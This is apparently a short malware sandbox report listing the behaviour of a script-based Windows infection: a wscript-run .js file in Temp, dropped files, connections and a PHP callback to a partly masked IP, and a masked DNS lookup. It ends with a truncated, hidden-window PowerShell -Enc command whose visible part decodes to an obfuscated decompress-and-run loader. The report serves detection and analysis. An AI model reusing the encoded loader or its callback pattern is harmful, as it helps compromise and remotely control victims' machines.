Technical Information
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Temp\sbzNavsVwxX.js"
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1932
- %WINDIR%\temp\sbznavsvwxx.js
- %TEMP%\1223266.cvr
- '5.###.62.229':80
- '5.###.62.229':443
- http://5.###.62.229/73891918.php
- DNS ASK h5#####xaaz56k11.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Enc IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBt...' (with hidden window)